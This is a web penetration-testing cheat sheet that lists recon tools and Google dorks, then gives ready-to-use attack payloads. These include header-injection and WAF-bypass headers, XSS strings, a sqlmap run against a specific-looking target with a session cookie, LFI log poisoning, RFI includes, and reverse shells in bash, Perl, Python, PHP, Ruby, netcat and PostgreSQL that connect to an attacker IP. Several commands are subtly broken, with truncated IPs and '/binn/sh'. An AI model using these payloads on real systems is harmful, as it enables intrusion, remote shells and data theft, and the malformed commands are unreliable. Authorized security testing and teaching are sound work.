• HTTP Status Codes
• Information Gathering
• Whois
• BGP
• DNS
• Browse site
• Headers
• Header Injection
• SSL
• Waf detection
• Scanners
• Directory mapping/bruteforce
• File upload
• SSRF
• Command injection
• LFI
• RFI
• XSS
• SQLi
• ClickJacking
• Fuzzing
• Utilities
• Getting Shell
• Most complete list

Table of contents generated with markdown-toc

HTTP Status Codes

• 1xx — Informational.
• 2xx — The request was successful.
• 3xx — The client is redirected to a different resource.
• 4xx — The request contains an error of some kind.
• 5xx — The server encountered an error fulfilling the request.

Information Gathering

• LeakIX
• SpiderFoot
• Maltego
• Security Headers
• Google dorks
• WayBackMachine
• Shodan

site:www.site.com filetype:doc,docx,pdf,txt,xml
site:www.site.com inurl:wp-content,admin,wp-admin,old,bkp,backup,sql,dump,Index of
site:www.site.com login
link:www.site.com
related:www.site.com

Whois

• Censys
• Verificar se o ip pertence a sistemas de segurança ex: Cloudflare
• Whois buscando por inetnum
• Advanced CLI usage

whois 204.225.42.33 | fgrep inetnum

BGP

• bgp.he.net
• traceroute
• mtr

DNS

• Complete mapping
• Knockpy
• Subdomain takeover
• dnsrecon

dnsrecon -d site.com -k -b -z -y --iw
     -b Bing search
     -k crt.sh enum
     -z DNSSEC zone walk with standard enumeration
     -y Yandex search
     --iw Continue brute forcing even with wildcard records
     -x <file.xml> Save output in xml format

• dnsenum

dnsenum --noreverse --nocolor -w -p 5 site.com > dnsenum_site.com
     -p 5 Number of google pages to process
     -w Perform whois queries

• dnsmap

dnsmap site.com -r dnsmap_site.com -w /usr/share/dnsrecon/top1mil.txt

• gobuster

Browse site

Explore the system

• Register
• Login
• Logout
• Recover password
• Forms
• File upload
• Functionalities
• Integrations

Headers

Always consider

• Referer
• User-Agent

As possibly entry points for input-based attacks!

• Bypass site controls

X-Original-URL: /admin
X-Rewrite-URL: /.git/

• Specify a user-agent for cell-phone or tablet to see if there are differences. Burp has a built-in payload list of User Agents.
• Add headers for the application to process. ex:

X-Forwarded-For: 127.0.0.1

• CSPEvaluator

Header Injection

• Change

Host: google.com
Host: localhost

• Add

X-Host: google.com
X-Forwarded-Host: google.com

• Add X-Forwarded-Host: (original Host:) and change Host: to the desired redirect host, ex: google.com

Host: google.com
X-Forwarded-Host: 200.1.2.3

• GET /lab/login.php

GET http://google.com/lab/login.php (Aceita apenas HTTP, não aceita HTTPS)

• XSS - Tests for reflection

Host: test
X-Forwarded-Host: teste -> X-Forwarded-Host teste"><script>alert(1)</script>
User-Agent (when used by the application) User-Agent: <script>alert(1)</script>

• Cross-Domain Referer Leakage Point the referer to a webserver under your control, the site will send the form contents to your system.

Referer: http://yoursite.com/
or
nc -lvvnp 4444
ngrok http 4444 -> Use the informed URL

• Cache poisoning

Host: evilsite.com (if site uses Host to reflect any link in page)
GET http://evilsite.com/app/login.php (just HTTP, HTTPS will not work)

• Cookie Bomb

Host: 252.252.252.252 (to test, only if cookie uses this to build some cookie)
X-Host: 252.252.252.252 (to test...)
X-Host: CCCCCCCCCCCCC.......many more until reach max possible length >2048 or 4096 chars if possible

SSL

• Censys
• SSL Labs
• sslscan
• sslyze

Waf detection

• wafw00f
• whatwaf
• Bypass

X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

Scanners

• nmap
• Nuclei
• OSINT Brazuca
• Rekono
• AutoPWN Suite
• Nikto

/etc/nikto.conf (Cookies, Proxy, etc)
nikto --host https://.... -useproxy

• Wapiti
• WpScan
• Skipfish
• WhatWeb

Directory mapping/bruteforce

• dirbuster - Recursive
• gobuster - Parallelism
• wfuzz

File upload

• weevely
• Intercept file upload and change extension from jpg, png to php, aspx, etc
• Add extensions, change content-type
• Owasp CheatSheet
• Imran-Parray CheatSheet
• Create a polyglot PHP/JPG file

exiftool -Comment="<?php echo 'START ' . file_get_contents('/etc/passwd') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php

SSRF

• spoofed.burpcollaborator.net resolves to 127.0.0.1

Command injection

• commix
• Use Pipes, &&
• Remote Shells Atacker IP is 10.20.14:8080 To listen for port 8080 use the foolowing command:

nc -vv -l -p 8080

** BASH
bash -i >& /dev/tcp/10.20.14.203/8080 0>&1

** PERL
perl -e 'use Socket;$i="10.20.14";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

** Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.20.14",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

** PHP
php -r '$sock=fsockopen("10.20.14",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
<?passthru("nc -e /binn/sh 10.20.14.1 8888");?>

** Ruby
ruby -rsocket -e'f=TCPSocket.open("10.20.14",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

** Netcat
nc -e /bin/sh 10.20.14 8080

LFI

• /proc/self/environ
• /var/log/auth.log
• /var/log/apache2/access.log
• /var/log/nginx/access.log
• Put in the "User-Agent"

<?passthru("nc -e /binn/sh 10.20.14.1 8888");?>

Then open

../../../../../proc/self/environ

• Try to open an SSH session with

nc -vv -l -p 8888
ssh "<?passthru('nc -e /bin/sh 10.20.14.1 8888');?>"@10.20.14.30

Encode " nc -e /binn/sh 10.20.14.1 8888 " with Base64:

ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbm4vc2ggMTAuMjAuMTQuMSA4ODg4'));?>"@10.20.14.30

Then open

../../../../../var/log/auth.log

RFI

• Save code as ".txt" file in atacker machine
• Include as usual with an "?" in front of URL

Try with some captilazed letters...

page=http://10.1.2.3/reverse.txt?
page=hTTp://10.1.2.3/reverse.txt?

XSS

• XSS Injection
• Standard tests:

"<script>alert(1)</script>
";alert(1)//
'-alert(1)-'

• NULL byte:

[%00]

• Encoding

% = %25

• Test methods GET and POST always!
• xss scanner online
• xsscrapy
• xsser
• xsstrike
• toxssin
• wfuzz
• test JQuery < 3.5

$.get("http://sakurity.com/jqueryxss") -> find if app uses this JQuery function ($.get())

• AngularJS Test for multiplication on parameters ex: 23, 45, etc...Then search for a specific payload at Payload All The Things
• Portswigger CheatSheet

SQLi

• sqlmap Could proxy through BurpSuite, but not ZAP...

sqlmap -u "https://adm.targetorg.com.br/en-us/contacts/?name=Baio&email=baio%40gmail.com&phone=5514997882832&department=adm" \
       --random-agent --level 5 -a -D PostgreSQL \
       --tamper between,randomcase,space2comment \
       --smart --hpp --dump-format SQLITE \
       --proxy http://127.0.0.1:8081 \
       -v --cookie="sessionid=gk5kpg9kaja2fzk0reh3k4xy" \

• wfuzz
• Bypass Cloudflare

1%27/**/%256fR/**50%2521%253D22%253B%2523 = 1'/**/oR/**50!=22;#

• Portswigger CheatSheet

ClickJacking

• Porswigger

Fuzzing

• wfuzz
• ffuf
• fuzzdb

Utilities

• lit-bb-hack-tools
• Linux Exploit Suggester

Getting Shell

• revshells.com
• PostgreSQL

1. Connect to the DB
2. Create a new table
     CREATE TABLE demo(t text);
3. Run the listener
     nc -nlvp 2020
4. Exploit
     COPY demo FROM PROGRAM ‘nc 10.10.10.10. 2020 -c bash’;
5. Do not forget to clean after yourself
     DROP TABLE demo;

Most complete list

• awesome-web-security